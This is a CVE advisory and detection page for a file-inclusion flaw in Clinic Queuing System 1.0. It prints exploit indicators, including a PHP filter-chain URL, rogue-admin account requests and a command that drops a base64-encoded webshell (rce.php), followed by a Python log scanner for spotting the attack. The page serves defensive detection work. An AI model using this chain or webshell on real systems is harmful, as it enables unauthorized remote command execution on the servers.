CVE-2024-0265
published 2024-01-07

CVE-2024-0265: A vulnerability was found in SourceCodester Clinic Queuing System 1.0. It has been rated as critical. This issue affects some unknown processing of the file…

Priority: P2 · 72 · high · 8.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 20.94% (97.2th percentile)
A vulnerability was found in SourceCodester Clinic Queuing System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /index.php of the component GET Parameter Handler. The manipulation of the argument page leads to file inclusion. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249821 was assigned to this vulnerability.

Affected

2 ranges
Vendor | Product | Version range | Fixed in
oretnom23 | clinic_queuing_system | |
sourcecodester | clinic_queuing_system | |

Detection & IOCs (extracted from sources)

url: /index.php?page=php://filter/convert.iconv.UTF8.CSISO2022KR|...|convert.base64-decode/resource=home
path: /LoginRegistration.php?a=save_user
path: /LoginRegistration.php?a=login
path: /rce.php
filename: rce.php
command: file_put_contents('rce.php',base64_decode('PD89YCRfR0VUWzBdYD8%2b'))
  • Detect LFI via PHP filter chain in the 'page' GET parameter of /index.php — look for requests containing 'php://filter' and multiple 'convert.iconv' or 'convert.base64' segments in the page parameter.
  • Monitor for creation of 'rce.php' in the web root, which is the dropped PHP backdoor (base64 payload decodes to a PHP webshell executing GET parameter 0 via backtick shell execution).
  • Detect the two-stage exploit: first a POST to /LoginRegistration.php?a=save_user to create a rogue admin account, followed by POST to /LoginRegistration.php?a=login and then GET to /?page= with a php://filter chain.
  • The exploit uses a canary string 'jmrcsnchz' in the RCE payload to confirm code execution; look for this string in HTTP responses or server-side logs.
  • The dropped webshell (rce.php) is accessed via GET requests with a numeric parameter '0' containing OS commands (e.g., ?0=whoami); monitor for GET requests to /rce.php with shell command strings.
  • The exploit chains CVE-2024-0264 (unauthenticated admin account creation) with CVE-2024-0265 (authenticated LFI via PHP filter chain); both CVEs must be present for the full RCE chain to work.
  • The vulnerability is specific to Clinic Queuing System version 1.0 running on PHP with SQLite3; the PHP filter chain technique requires the iconv and base64 filter wrappers to be enabled on the server.
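
The detection points above can be checked against web server access logs. The following is an added example, not code from this page or from any referenced source: it assumes combined-format access logs that record the query string, and the log lines, function names and client addresses are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs
# Constructed sample access-log lines (combined log format, documentation IP ranges).
SAMPLE_LOG = """\
198.51.100.7 - - [07/Jan/2024:10:00:01 +0000] "POST /LoginRegistration.php?a=save_user HTTP/1.1" 200 45
198.51.100.7 - - [07/Jan/2024:10:00:02 +0000] "POST /LoginRegistration.php?a=login HTTP/1.1" 200 52
198.51.100.7 - - [07/Jan/2024:10:00:03 +0000] "GET /index.php?page=php://filter/convert.iconv.UTF8.CSISO2022KR%7Cconvert.iconv.UTF8.CSISO2022KR%7Cconvert.base64-decode/resource=home HTTP/1.1" 200 913
198.51.100.7 - - [07/Jan/2024:10:00:04 +0000] "GET /rce.php?0=whoami HTTP/1.1" 200 9
203.0.113.20 - - [07/Jan/2024:10:01:00 +0000] "GET /index.php?page=home HTTP/1.1" 200 4210
203.0.113.20 - - [07/Jan/2024:10:01:05 +0000] "POST /LoginRegistration.php?a=login HTTP/1.1" 200 52
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" \d{3}')
SEGMENT_RE = re.compile(r"convert\.(?:iconv|base64)", re.I)
ORDER = ["save_user", "login", "filter_chain"]  # stage order of the chained requests

def classify(method, target):
    """Return the indicator name matched by one request, or None."""
    url = urlsplit(target)
    path, qs = url.path.lower(), parse_qs(url.query, keep_blank_values=True)
    if path in ("/", "/index.php"):
        for value in qs.get("page", []):  # parse_qs has already percent-decoded the value
            if "php://filter" in value.lower() and len(SEGMENT_RE.findall(value)) >= 2:
                return "filter_chain"
    if path == "/loginregistration.php" and method == "POST":
        action = qs.get("a", [""])[0]
        if action in ("save_user", "login"):
            return action
    if path == "/rce.php" and "0" in qs:
        return "webshell_access"
    return None

def scan(log_text):
    """Return (alerts, chained): per-request hits and client IPs that ran all stages in order."""
    alerts, stage, chained = [], {}, set()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m is None:
            continue
        ip, method, target = m.groups()
        hit = classify(method, target)
        if hit in ("filter_chain", "webshell_access"):
            alerts.append((ip, hit))
        pos = stage.get(ip, 0)
        if hit == ORDER[pos]:  # advance only on the next expected stage for this client
            stage[ip] = (pos + 1) % len(ORDER)
            if stage[ip] == 0:
                chained.add(ip)
    return alerts, chained
```

A lone login POST or a normal `page=home` request produces no alert; only the filter-chain request, access to `/rce.php` with parameter `0`, and the full ordered sequence from one client are reported.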

CVSS provenance

nvd | v3.1 | 8.8 | HIGH | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvd | v2.0 | 6.5 | MEDIUM | AV:N/AC:L/Au:S/C:P/I:P/A:P